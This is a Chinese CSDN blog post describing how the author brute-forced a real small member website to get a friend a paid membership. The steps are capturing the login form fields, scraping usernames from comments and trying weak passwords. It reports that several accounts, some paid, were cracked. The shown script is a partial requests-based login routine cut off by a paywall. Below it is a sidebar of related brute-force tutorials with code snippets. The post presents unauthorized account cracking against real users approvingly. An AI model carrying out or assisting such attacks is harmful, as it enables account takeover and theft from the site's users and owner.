python爆破示例_用python爆破某会员网站

最新推荐文章于 2024-07-30 11:53:50 发布
最新推荐文章于 2024-07-30 11:53:50 发布
阅读量668 收藏 4
点赞数 1
文章标签: python爆破示例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33335559/article/details/112840433
版权
本文介绍了如何使用Python进行模拟登录一个小型网站,并实现弱口令爆破。通过注册用户、Flidder抓包获取登录参数,利用requests模块发送POST请求模拟登录。接着,从评论区抓取用户名,结合常见弱密码尝试登录,最终成功爆破出多个账号,部分账号已充值会员。
摘要由CSDN通过智能技术生成

暑假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。

是吗

然后就有了思路(骚操作)

先讲一下思路

1 .先注册用户登录

2.flidder抓包

3.python 模拟登录

4.在评论区抓取评论的用户名

5.弱密码爆破

登录

登录页面如下

登录页面.png

flidder抓包

抓包之后发现有以下几个字段

'log': 'admin', # 用户名

'pwd': 'admin', # 密码

'wp-submit': '登录',

'redirect_to': '',

'wpuf_login': 'true',

'action': 'login',

'_wpnonce': '4b4e82f670',

'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'

只要用户名和密码不同,其他的不变

python 模拟登录

这部分就比较简单,用到requests模块

import re

import requests

def baopo(log):

url = 'http://XXXXXX.com/%e7%99%bb%e5%bd%95'

headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',

'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=t

最低0.47元/天 解锁文章
李应寰
关注
python制作企业邮箱的爆破脚本
09-21
使用Python进行爆破脚本开发 ##### 2.1 准备工作 在开始编写脚本之前,确保已安装Python环境以及必要的库。此示例中的脚本使用了`poplib`库,该库用于处理POP3协议,以便与邮件服务器通信。可以通过以下命令安装...
绕过token进行密码爆破(包含python攻击脚本)
weixin_43960066的博客
07-30 1431
设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。
python爆破ZIP文件(支持纯数字,数字+字母,密码本)
LainWith的博客
04-16 3342
目录乱码问题单线程纯数字爆破单线程数字字母爆破多线程爆破密码本单线程爆破3合1版(支持数字,数字+字母、密码本) 使用的是单线程,多线程会出现各种奇奇怪怪的问题,以后有时间再优化 乱码问题 破解压缩包时候会存在中文乱码问题! 解决办法1:【Python】使用 zipfile 解压含有中文文件名的 zip 文件 对自己的代码,进行重新编码。效率低下,进行爆破时候不能使用extractall,并且实验时没有成功。 解决办法2:解决python3解压文件名乱码问题(unzip) 简单好用!修改zipfile源
python如何实现简单的暴力破解
最新发布
weixin_43305645的博客
07-30 1459
该项目的核心是实现简单网页端的密码破解,主要是为了给没有基础的人,提供一个思路,了解这方面的攻防原理,实际用途不大,现在大部分有三代四代验证码,还有一些加密算法等,并不会像文章中这么简单的实现直接跑字典而获取密码。文章内的前后端是特意写的,需要源码的话,我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。
Python-密码爆破
weixin_57041250的博客
10-29 952
有密码的地方 均可使用爆破。但前提是登录无限制。
使用python实现zip爆破
a2106883567的博客
10-21 461
Pythonzipfile模块用来做zip格式编码的压缩和解压缩的,要进行相关操作,首先需要实例化一个ZipFile对象。ZipFile接受一个字符串格式压缩包名称作为它的必选参数,第二个参数为可选参数,表示打开模式,类似于文件操作,有r/w/a三种模式,分别代表读、写、添加,默认为r,即读模式。zipfile里有两个非常重要的class,分别是ZipFile和ZipInfo,在绝大多数的情况下,我们只需要使用这两个class就可以了。
Python开发:简单的密码爆破工具
Hacker_DB的博客
04-13 2862
我们进行在线密码破解时,使用 BurpSuite 以及 wfuzz 足以应对大部分网站应用场景。但是在遇到一些特殊情况时我们还是需要自己来开发密码爆破工具,本文将介绍如何使用Python开发一款简单的密码爆破工具。
python遍历路径破解表单的示例
01-21
首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。 ​...
Python实现在线暴力破解邮箱账号密码功能示例【测试可用】
01-20
本文实例讲述了Python实现在线暴力破解邮箱账号密码功能。分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : username@gmail.com:password username@gmail.com:password username@gmail.com:password...
python 密码学示例——凯撒密码的实现
09-24
# 示例 message = "This is my secret message." key = 13 encrypted = caesar_cipher(message, key, 'encrypt') decrypted = caesar_cipher(encrypted, key, 'decrypt') print(f"Original message: {message}") ...
OneForAll 域名爆破查找工具
04-01
示例python3 oneforall.py --target example.com run /*收集*/ python3 aiobrute.py --target example.com run /*爆破*/ python oneforall.py --target example.com run 使用时需进入所在目录!!!记得配置...
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
Python实现接口遍历爆破
AlvisLee的博客
03-30 364
Python实现接口遍历爆破
Python实现目录爆破
songling515010475的专栏
06-02 961
import urllib3 import queue import threading import sys import time def main(url, threadNum): #以队列的形式获取爆破路径 pathQueue = getPath(url) #通过多线程进行爆破 threads = [] for i in range(threadNum): t = threading.Thread(target=blastingUr...
python网站登录爆破登录_用python爆破会员网站
weixin_42360788的博客
02-04 756
暑假在家上网,qq群里一位好友给我说他想要某个网站会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。是吗然后就有了思路(骚操作)先讲一下思路1 .先注册用户登录2.flidder抓包3.python 模拟登录4.在评论区抓取评论的用户名5.弱密码爆破登录登录页面如下登录页面.pngflidder抓包抓包之后发现有以下几个字段'log': 'admin', # 用户名'pwd': '...
python写一个爆破网站管理员密码脚本
柠檬i的博客
11-05 6115
python脚本用requests库的post方法发送http post数据包,通过读取字典文件的方式来进行密码猜解,为了程序美观还加入了程序logo和彩色显示。
Python 爆破账密
weixin_45972507的博客
07-03 301
对云服务器爆破账密
Python 渗透测试:文件传输爆破( 21端口 )
网络安全领域___专研者.
05-21 3032
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
python爆破密码字典
04-26
以下是一个简单的示例代码,演示了如何使用Python进行密码爆破: ```python import requests target_url = "http://example.com/login" # 目标网站的登录接口 passwords = ["password1", "password2", "password3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值